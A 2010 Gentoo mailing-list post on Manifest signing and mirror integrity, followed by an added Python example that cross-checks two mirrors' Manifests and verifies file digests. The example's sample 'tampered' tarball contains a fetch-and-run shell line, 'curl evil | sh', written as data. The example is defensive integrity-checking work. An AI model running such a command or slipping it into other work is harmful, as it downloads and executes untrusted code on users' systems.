On Tuesday 06 April 2010 23:16:13 Alan McKinnon wrote:
> On Tuesday 06 April 2010 23:46:48 Mark Knecht wrote:
> > On Tue, Apr 6, 2010 at 2:26 PM, Alan McKinnon <alan.mckin...@gmail.com>
> > wrote: <SNIP>
> >
> > > FEATURES=sign
> > >
> > > "man 5 make.conf" implies that the dev signs the Manifest by checking
> > > something into the tree using repoman. Presumably, the user either has
> > > to fetch the public key or portage includes it in the tree. But
> > > documentation in the man pages is sparse, I can't find an explanation
> > > of how it should work.
> > >
> > >
> > > --
> > > alan dot mckinnon at gmail dot com
> >
> > Do you use it?
> 
> Without logging into the mirror host and checking, I really couldn't say. I
> mirror what I get from gentoo.org with no alterations.
> 
> I don't use the feature locally on any of my own boxes.

This was an argument against Gentoo more than six or seven years ago with
regard to the security of the whole portage system.  A number of suggestions
were made in those early days, one of them being to sync with two mirrors and
diff the ebuilds/Manifests/Distfiles affected by the two most recent syncs.  As
far as I know people didn't go for this because it was perceived that the
system as implemented was secure enough, and anyway the proposed solution would
put too much pressure on the mirrors.

BTW, there was some compromise of a mirror in those early days and a lot of
(well, maybe a few back then) people had to reinstall because their boxen were
compromised, or thought that they might have been!

If you google you may find something lurking around from the long arguments
that took place and what D. Robbins said.
-- 
Regards,
Mick

Attachment: signature.asc
Description: This is a digitally signed message part.

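The two-mirror cross-check Mick describes (sync from two independent mirrors, then diff the Manifests and the files they cover), written out as an added example. This is not code from the thread and not portage's own Manifest handling; it assumes Manifest2-style lines ("TYPE name size HASH hex ..."), uses SHA256 and SHA512 as the digest algorithms, and builds its two sample Manifests from constructed file contents so it runs offline. The Manifest text is assumed to be unarmoured: a clearsigned Manifest would first be verified and stripped with gpg, which is the separate step FEATURES=sign is about.

```python
"""Cross-check two independently synced Manifests and verify a distfile.

Added example, not portage code.  Manifest lines follow the Manifest2 layout
(TYPE filename size HASHNAME hexdigest [HASHNAME hexdigest ...]).  All file
contents and both Manifests below are constructed for the example.
"""
import hashlib

# Constructed sample files (not from any real Gentoo tree), keyed by Manifest type.
FILES = {
    ("DIST", "foo-1.0.tar.gz"): b"hello world",
    ("EBUILD", "foo-1.0.ebuild"): b'EAPI=2\nDESCRIPTION="example"\n',
    ("MISC", "metadata.xml"): b"<pkgmetadata/>\n",
}
# What a tampered (or simply stale) second mirror might serve for the tarball.
TAMPERED_TARBALL = b"hello world; curl evil | sh\n"

# Digest algorithms this checker knows how to recompute.
HASHERS = {"SHA256": hashlib.sha256, "SHA512": hashlib.sha512}


def manifest_line(ftype, name, data):
    """Render one Manifest2-style entry for the given file contents."""
    digests = " ".join(f"{algo} {h(data).hexdigest()}" for algo, h in HASHERS.items())
    return f"{ftype} {name} {len(data)} {digests}"


def build_manifest(files):
    """Render a whole Manifest from a {(type, name): bytes} mapping."""
    return "\n".join(manifest_line(t, n, d) for (t, n), d in files.items()) + "\n"


# Sync A is clean; sync B carries a different entry for the tarball.
MANIFEST_A = build_manifest(FILES)
MANIFEST_B = build_manifest({**FILES, ("DIST", "foo-1.0.tar.gz"): TAMPERED_TARBALL})


def parse_manifest(text):
    """Parse Manifest text into {(type, name): {"size": int, "hashes": {ALGO: hex}}}.

    Rejects malformed lines instead of skipping them: a line that does not
    parse is exactly the kind of thing a tampered tree would contain.
    """
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields:
            continue
        # TYPE name size + (algo, hex) pairs => odd field count, at least 5.
        if len(fields) < 5 or len(fields) % 2 != 1:
            raise ValueError(f"malformed Manifest line {lineno}: {line!r}")
        ftype, name, size = fields[0], fields[1], int(fields[2])
        hashes = {fields[i].upper(): fields[i + 1].lower() for i in range(3, len(fields), 2)}
        entries[(ftype, name)] = {"size": size, "hashes": hashes}
    return entries


def diff_manifests(a, b):
    """Return sorted (type, name, reason) tuples for every disagreement between
    two independently obtained Manifests.  An empty list means both mirrors
    served the same entries, which is all this check can establish."""
    problems = []
    for key in sorted(set(a) | set(b)):
        if key not in a or key not in b:
            problems.append((*key, "present in only one sync"))
            continue
        ea, eb = a[key], b[key]
        if ea["size"] != eb["size"]:
            problems.append((*key, "size differs"))
        for algo in sorted(set(ea["hashes"]) & set(eb["hashes"])):
            if ea["hashes"][algo] != eb["hashes"][algo]:
                problems.append((*key, f"{algo} differs"))
    return problems


def verify_file(entry, data):
    """Check fetched bytes against a Manifest entry.

    Size and every digest we can recompute must match, and at least one digest
    must actually have been checked: an entry listing only algorithms we do
    not know is not a pass.
    """
    if len(data) != entry["size"]:
        return False
    checked = 0
    for algo, expected in entry["hashes"].items():
        hasher = HASHERS.get(algo)
        if hasher is None:
            continue
        if hasher(data).hexdigest() != expected:
            return False
        checked += 1
    return checked > 0


if __name__ == "__main__":
    sync_a, sync_b = parse_manifest(MANIFEST_A), parse_manifest(MANIFEST_B)
    for ftype, name, reason in diff_manifests(sync_a, sync_b):
        print(f"MISMATCH {ftype} {name}: {reason}")
    tarball = ("DIST", "foo-1.0.tar.gz")
    print("tarball matches sync A:", verify_file(sync_a[tarball], FILES[tarball]))
    print("tampered tarball matches sync A:", verify_file(sync_a[tarball], TAMPERED_TARBALL))
```

Agreement between the two syncs only shows that both mirrors served the same tree; if both were fed the same bad content, the diff is empty. What tells you the tree is the one the developers committed is a signature on the Manifest verified against a key obtained out of band, which is the gap Alan's question about FEATURES=sign points at.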